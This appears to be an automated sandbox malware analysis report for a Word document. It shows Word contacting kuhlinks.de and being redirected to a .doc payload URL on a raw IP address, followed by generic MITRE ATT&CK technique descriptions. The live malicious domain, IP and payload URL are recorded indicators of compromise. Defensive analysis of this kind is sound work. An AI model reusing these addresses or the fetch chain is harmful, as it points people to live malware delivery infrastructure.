Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.24	60832	172.67.144.140	443	7312	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 10:00:39 UTC	324	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: kuhlinks.de
2025-04-02 10:00:39 UTC	1021	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 10:00:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cf-Ray: 929f7afd6a2eb2c0-EWR Server: cloudflare Allow: GET,HEAD Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Cf-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJWlFlQPdb9ELvMhM6flFdOdNcTSnw01udc1T2puqczOsLlmMEr7BfAb5KY6fwk%2FzoRleTyJ%2FM8e8bnfs8ncyT8FyKDz63PL1zqQpOObncI27mbpK8QzAtUN%2BCjd0w%3D%3D"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=111968&min_rtt=99158&rtt_var=34397&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=938&delivery_rate=37553&cwnd=232&unsent_bytes=0&cid=3be4d5f1ebddf068&ts=591&x=0"
2025-04-02 10:00:39 UTC	13	IN	Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a Data Ascii: 8GET,HEAD
2025-04-02 10:00:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.24	60833	172.67.144.140	443	7312	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 10:00:39 UTC	227	OUT	OPTIONS / HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Protocol Discovery Host: kuhlinks.de Content-Length: 0 Connection: Keep-Alive
2025-04-02 10:00:40 UTC	1020	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 10:00:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cf-Ray: 929f7b031e81377d-EWR Server: cloudflare Allow: GET,HEAD Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Cf-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8NZZxs2YpcMN0sC2HNRbherDeG1doE4c7BoJhBaKHs8EPYnIu88wLIeUS0Lv7i3B%2FyubEH8CEmh9932zmdxXkYRsILVsefSrYoevQ2rlSR4dSZ%2F9x6iB2DlDF27ng%3D%3D"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=131428&min_rtt=130398&rtt_var=28563&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=841&delivery_rate=28558&cwnd=226&unsent_bytes=0&cid=6d5d3262b51173d4&ts=639&x=0"
2025-04-02 10:00:40 UTC	13	IN	Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a Data Ascii: 8GET,HEAD
2025-04-02 10:00:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.24	60834	172.67.144.140	443	7312	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 10:00:40 UTC	310	OUT	HEAD /3ri5DVX HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2 X-IDCRL_ACCEPTED: t Host: kuhlinks.de
2025-04-02 10:00:41 UTC	1204	IN	HTTP/1.1 302 Found Date: Wed, 02 Apr 2025 10:00:41 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 192 Connection: close location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc strict-transport-security: max-age=15552000; includeSubDomains vary: Accept x-content-type-options: nosniff x-dns-prefetch-control: off x-download-options: noopen x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ObtIqYNqC8BkUIwIt4b%2FWdMpovXDYnPDi568zH8s3%2Bp8K8cMoZYC461VPHTT6wO%2F28TRvIGiTcqnVniVRPZdVU28Mu1SJzpIo3sgrS2JukUJ0Oe%2F3pKOKZ%2BWMLDl%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 929f7b091968566e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=134831&min_rtt=130470&rtt_var=32039&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=924&delivery_rate=28529&cwnd=234&unsent_bytes=0&cid=6c32449698082076&ts=656&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.24	60838	172.67.144.140	443	7312	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 10:00:42 UTC	190	OUT	GET /3ri5DVX HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: kuhlinks.de Connection: Keep-Alive
2025-04-02 10:00:42 UTC	1194	IN	HTTP/1.1 302 Found Date: Wed, 02 Apr 2025 10:00:42 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 192 Connection: close Cf-Ray: 929f7b11df014228-EWR Server: cloudflare Location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Cf-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dC7WRBeFABtnDyAUDvDACHhjdYz5q4F7LA%2BD5selGvWflkZbqyRFii0HI9gJxNYYCvCiA509LuCycQmVSpq4XKE0pbU9QQ%2BHts6Gm6IfDs9kzaGuLJFJzcsh5haAYQ%3D%3D"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=96632&min_rtt=95927&rtt_var=20956&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=772&delivery_rate=38824&cwnd=217&unsent_bytes=0&cid=17cffa7a754cd8c1&ts=567&x=0"
2025-04-02 10:00:42 UTC	175	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 31 36 2e 39 2e 32 32 34 2e 31 38 35 2f 31 32 32 2f 77 65 6e 64 2f 73 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 77 65 63 61 6e 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 5f 5f 5f 5f 5f 5f 5f 5f 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74 Data Ascii: Found. Redirecting to http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeet
2025-04-02 10:00:42 UTC	17	IN	Data Raw: 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 2e 64 6f 63 Data Ascii: urncheclkgood.doc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.24	60843	172.67.144.140	443	7312	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 10:00:44 UTC	213	OUT	HEAD /3ri5DVX HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: kuhlinks.de Connection: Keep-Alive
2025-04-02 10:00:45 UTC	1196	IN	HTTP/1.1 302 Found Date: Wed, 02 Apr 2025 10:00:45 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 192 Connection: close Cf-Ray: 929f7b209fd7d826-EWR Location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Cf-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IP2C12XfXgrT%2Fb8TrQaKQQn4KzUdZNoMgtI1Icnp4EMAxDTMyEkpIeo3ZiN2Qwtli%2F3NDvFs2v%2FAdOWUvwzzEz8700eHN2Wpuh6p1JNdVCDBX1I1ymMHQ5OJc0q0AA%3D%3D"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=98139&min_rtt=97709&rtt_var=21260&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=827&delivery_rate=37626&cwnd=241&unsent_bytes=0&cid=57b00569acf32f17&ts=598&x=0"

Statistics

CPU Usage

• WINWORD.EXE

Click to jump to process

Memory Usage

• WINWORD.EXE

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Target ID:	1
Start time:	06:00:33
Start date:	02/04/2025
Path:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x7ff7f51c0000
File size:	1'637'952 bytes
MD5 hash:	A9F0EC89897AC6C878D217DFB64CA752
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IMP 7527518303 2507294.docx.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\IMP 7527518303 2507294.docx.doc (copy)

C:\Users\user\Desktop\~$P 7527518303 2507294.docx.doc

C:\Users\user\Desktop\~WRD0000.tmp

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Static File Info

General

File Icon

Static OLE Info

General

OLE File "IMP 7527518303 2507294.docx.doc"

Indicators

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
IMP 7527518303 2507294.docx.doc